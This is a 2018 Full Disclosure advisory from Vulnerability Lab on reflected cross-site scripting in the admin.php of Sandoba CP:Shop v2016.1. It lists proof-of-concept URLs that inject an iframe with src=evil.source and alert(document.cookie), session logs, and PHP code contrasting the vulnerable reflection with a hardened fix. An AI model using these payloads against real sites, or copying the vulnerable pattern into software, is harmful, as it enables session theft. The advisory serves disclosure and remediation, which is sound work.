
List:       full-disclosure
Subject:    [FD] Sandoba CP:Shop CMS v2016.1 - Multiple Cross Site Scripting Vulnerabilities
From:       Vulnerability Lab <research () vulnerability-lab ! com>
Date:       2018-03-27 14:08:00
Message-ID: 355befdd-5253-dd3d-b325-92f4177155eb () vulnerability-lab ! com

Document Title:
===============
Sandoba CP:Shop CMS v2016.1 - Multiple Cross Site Scripting Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2122


Release Date:
=============
2018-03-02


Vulnerability Laboratory ID (VL-ID):
====================================
2122


Common Vulnerability Scoring System:
====================================
3.4


Vulnerability Class:
====================
Cross Site Scripting - Non Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
CP:Shop is the basis for your lasting success on the Internet. The system was designed so that customers are optimally supplied with information about articles, special promotions and discounts on the one hand, while the shop operator is at the same time subjected to essential work steps through automation.

(Copy of the homepage: https://www.sandoba.de/produkte/shop-software-cpshop/)


Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered multiple non-persistent cross site scripting vulnerabilities in the official Sandoba CP:Shop v2016.1 CMS.


Vulnerability Disclosure Timeline:
==================================
2018-03-02: Public Disclosure (Vulnerability Laboratory)



Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Pre auth - no privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple non-persistent cross site scripting vulnerabilities have been discovered in the official Sandoba CP:Shop v2016.1 Content Management System. The vulnerabilities allow remote attackers to inject their own malicious script code through a non-persistent attack vector in order to compromise browser-to-web-application requests.

The security vulnerabilities are located in the `admin.php` file of the `./cpshop/` module. Remote attackers are able to inject their own script code into the vulnerable web-application parameters requested on the client side. The attack vector is non-persistent and the request method used to inject and execute is GET. The issues are classic client-side cross site scripting vulnerabilities.

Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious sources and non-persistent manipulation of affected or connected application modules.

Request Method(s):
[+] GET

Vulnerable File(s):
[+] admin.php

Vulnerable Parameter(s):
[+] path
[+] search
[+] rename
[+] dir


Proof of Concept (PoC):
=======================
The web vulnerabilities can be exploited by remote attackers without a privileged user account and with low user interaction. For a security demonstration, or to reproduce the vulnerability, follow the information and steps provided below.


PoC: Exploitation
https://cpshop.localhost:8080/cpshop/admin.php#!file=files&mode=rename_dir&form[dir]=fancybox&form[path]=
 %22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E

http://cpshop.localhost:8080/cpshop/admin.php?form%5Bsearch%5D=
%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&form%5Bvar%5D=1&form%5Bposter%5D=0&form%5Bcategory%5D=0&file=news


http://cpshop.localhost:8080/cpshop/admin.php?form[search]=https://www.test.de#!file=files&mode=rename_dir&form[dir]=
 %22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&form[path]=.

http://cpshop.localhost:8080/cpshop/admin.php?form[search]=https://www.test.de#!file=files&mode=rename_dir&form[dir]=TEST&form[path]=
 %22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E

http://cpshop.localhost:8080/cpshop/admin.php#!file=help&mode=search&search=
%22%3E%22%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&select_box=2

https://cpshop.localhost:8080/cpshop/admin.php#!file=files&mode=rename_dir&form[dir]=
de%3E%22%3Ciframe%20src=evil.source%3E&form[path]=modules%2Ffast_gallery%2Flanguages


PoC: Session Logs
Status: 200[OK]
GET https://cpshop.localhost:8080admin.php?file=files&mode=rename_dir&form[dir]=fancybox&form[pa \
th]=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&cleanajax=yes   Mime \
Type[text/html]  Request Header:
      Host[cpshop.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 \
Firefox/56.0]  Accept[*/*]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate, br]
      X-Requested-With[XMLHttpRequest]
      Referer[https://cpshop.localhost:8080admin.php]
      Cookie[shop_userkey=afb404c7622db6ced7a120e8e4e24505; log_data=DEMOADMINSHOP; \
PHPSESSID=03f32863066e90b45f109d7b1d5a0b5e; language=de; cookieconsent_dismissed=yes]  \
Connection[keep-alive]  Response Header:
      server[Apache/2.4.27]
      x-powered-by[PHP/7.0.20]
      expires[Thu, 19 Nov 1981 08:52:00 GMT]
      cache-control[no-store, no-cache, must-revalidate]
      pragma[no-cache]
      x-frame-options[SAMEORIGIN]
      content-encoding[gzip]
      set-cookie[language=de; expires=Tue, 20-Feb-2018 13:00:40 GMT; Max-Age=259200; path=/]
      content-type[text/html; charset=utf-8]
      X-Firefox-Spdy[h2]
-
Status: 302[Found]
GET https://cpshop.localhost:8080/evil.source
Mime Type[text/html]
   Request Header:
      Host[cpshop.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 \
                Firefox/56.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate, br]
      Referer[https://cpshop.localhost:8080admin.php]
      Cookie[shop_userkey=afb404c7622db6ced7a120e8e4e24505; log_data=DEMOADMINSHOP; \
PHPSESSID=03f32863066e90b45f109d7b1d5a0b5e; language=de; cookieconsent_dismissed=yes]  \
Connection[keep-alive]  Upgrade-Insecure-Requests[1]
   Response Header:
      server[Apache/2.4.27]
      location[http://cpshop.localhost:8080]
      content-length[296]
      content-type[text/html; charset=iso-8859-1]
      X-Firefox-Spdy[h2]
-
Status: pending[]
GET http://cpshop.localhost:8080/cpshop/admin.php?file=news&clean=yes&ajax=yes&form%5Bsearch%5D=
 http%3A%2F%2Fcpshop.localhost:8080%2Fcpshop%2Fadmin.php%3Fform%255Bsearch%255D%3D%2522%253E%253Ciframe%2Bsrc%253Devil.source%2B
 onl&form%5Bvar%5D=1&form%5Bposter%5D=0&form%5Bcategory%5D=0&file=news 
	Mime Type[unknown]
   Request Header:
      Host[cpshop.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 \
Firefox/56.0]  Accept[*/*]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      X-Requested-With[XMLHttpRequest]
      Referer[http://cpshop.localhost:8080/cpshop/admin.php]
      Cookie[log_data=DEMOADMINCMS; PHPSESSID=aa820d024a8b72f3a57e12e72cc63bb6; language=de]
      DNT[1]
-
14:06:37.847[179ms][total 538ms] Status: 200[OK]
GET http://cpshop.localhost:8080/cpshop/admin.php?form%5Bsearch%5D=http%3A%2F%2Fcpshop.localhost \
:8080%2Fcpshop%2Fadmin.php%3Fform%255Bsearch%255D%3D%2522%253E%253Ciframe%2Bsrc%253Devil.source%2Bonl&form%5Bvar%5D=1&form%5Bposter%5D=0&form%5Bcategory%5D=0&file=news \
  Mime Type[text/html]
   Request Header:
      Host[cpshop.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 \
                Firefox/56.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://cpshop.localhost:8080/cpshop/admin.php]
      Cookie[log_data=DEMOADMINCMS; PHPSESSID=aa820d024a8b72f3a57e12e72cc63bb6; language=de]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
   Response Header:
      Server[Apache/2.4.27]
      X-Powered-By[PHP/7.0.20]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate]
      Pragma[no-cache]
      X-Frame-Options[SAMEORIGIN]
      Content-Encoding[gzip]
      Set-Cookie[language=de; expires=Tue, 20-Feb-2018 13:06:37 GMT; Max-Age=259200; path=/]
      Upgrade[h2c]
      Connection[Upgrade, Keep-Alive]
      Keep-Alive[timeout=5, max=100]
      Transfer-Encoding[chunked]
      Content-Type[text/html; charset=utf-8]


Reference(s):
http://cpshop.localhost:8080/cpshop/admin.php?form%5Bsearch%5D=
http://cpshop.localhost:8080/cpshop/admin.php#!file=help&mode=search&search=
https://cpshop.localhost:8080/cpshop/admin.php#!file=files&mode=rename_dir&form[dir]=fancybox&form[path]=
http://cpshop.localhost:8080/cpshop/admin.php?form[search]=https://www.test.de#!file=files&mode=rename_dir&form[dir]=
https://cpshop.localhost:8080/cpshop/admin.php#!file=files&mode=rename_dir&form[dir]=


Solution - Fix & Patch:
=======================
The cross site scripting vulnerabilities can be resolved by applying htmlentities to the reflected parameter values and by a secure input restriction of the characters allowed in them.
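As an added illustration of the fix described above (example code, not CP:Shop's own): the reflection pattern for the `form[dir]` and `form[path]` parameters of the rename handler beside a hardened version that validates directory names against a strict allow-list and encodes output with `htmlentities`; the same output encoding applies to the `search` and `rename` parameters. Because the affected file is the admin panel, the reflected payload would execute in an administrator's browser session, which is what the session log's cookie values show. The handler shape and all function names are assumptions.

```php
<?php
// Added example, not CP:Shop's own code. Assumed: admin.php reads form[dir] and
// form[path] from $_GET (as in the PoC URLs) and echoes them into a rename form.
// Vulnerable pattern: the raw value lands inside an attribute, so a value that
// begins with  "><iframe ...>  closes the attribute and injects markup.
function render_rename_form_vulnerable(array $form): string {
    $dir  = (string) ($form['dir']  ?? '');
    $path = (string) ($form['path'] ?? '');
    return '<input type="text" name="form[dir]" value="' . $dir . '">'
         . '<input type="hidden" name="form[path]" value="' . $path . '">';
}

// Output encoding for HTML text/attribute context: ENT_QUOTES escapes both quote
// styles, ENT_SUBSTITUTE keeps invalid UTF-8 from yielding an empty string.
function h(string $value): string {
    return htmlentities($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

// Input restriction for one directory name: only characters a name needs,
// no separators, and no "." / ".." traversal segments.
function is_safe_dir_name(string $name): bool {
    return preg_match('/\A[A-Za-z0-9._-]{1,64}\z/', $name) === 1
        && $name !== '.' && $name !== '..';
}

// A relative path such as modules/fast_gallery/languages is checked per segment.
function is_safe_rel_path(string $path): bool {
    if ($path === '' || $path === '.') { return true; }
    foreach (explode('/', $path) as $segment) {
        if (!is_safe_dir_name($segment)) { return false; }
    }
    return true;
}

// Hardened handler: validate first, encode on output. Invalid input is rejected
// rather than "cleaned", so the payload never reaches the page.
function render_rename_form_fixed(array $form): string {
    $dir  = (string) ($form['dir']  ?? '');
    $path = (string) ($form['path'] ?? '');
    if (!is_safe_dir_name($dir) || !is_safe_rel_path($path)) {
        http_response_code(400);
        return '<p>Invalid directory name or path.</p>';
    }
    return '<input type="text" name="form[dir]" value="' . h($dir) . '">'
         . '<input type="hidden" name="form[path]" value="' . h($path) . '">';
}
// Constructed input: the decoded form of the advisory's PoC payload.
$poc = ['dir' => 'fancybox', 'path' => '"><iframe src=evil.source onload=alert(document.cookie)>'];
echo render_rename_form_vulnerable($poc), "\n"; // iframe markup ends up in the page
echo render_rename_form_fixed($poc), "\n";      // rejected with HTTP 400
```

Values that pass the allow-list contain no characters that `htmlentities` would change, so the two layers are independent: the encoding alone already neutralises the PoC payload, and the restriction additionally blocks path traversal in the file manager.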



Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerabilities in the web-application is estimated as medium (CVSS 3.4).


Credits & Authors:
==================
Vulnerability-Lab [research@vulnerability-lab.com] - \
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or  implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any  case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability Labs or its  \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability mainly for incidental or consequential damages so the \
foregoing limitation may not apply. We do not approve or encourage anybody to break any \
licenses, policies, deface  websites, hack into databases or trade with stolen data. We have no \
need for criminal activities or membership requests. We do not publish advisories  or \
vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or \
individuals. We do not publish trade researcher mails,  phone numbers, conversations or \
anything else to journalists, investigative authorities or private individuals. 

Domains:    www.vulnerability-lab.com		- www.vulnerability-db.com					- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php 	- \
                vulnerability-lab.com/list-of-bug-bounty-programs.php 	- \
                vulnerability-lab.com/register.php
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- \
                vulnerability-lab.com/rss/rss_news.php
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- \
youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, resources or \
information requires authorization from Vulnerability Laboratory.  Permission to electronically \
redistribute this alert in its unmodified form is granted. All other rights, including the use \
of other media, are reserved by  Vulnerability Lab Research Team or its suppliers. All \
pictures, texts, advisories, source code, videos and other information on this website is \
trademark  of vulnerability-lab team & the specific authors or managers. To record, list, \
modify, use or edit our material contact (admin@) to get an ask permission.

Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

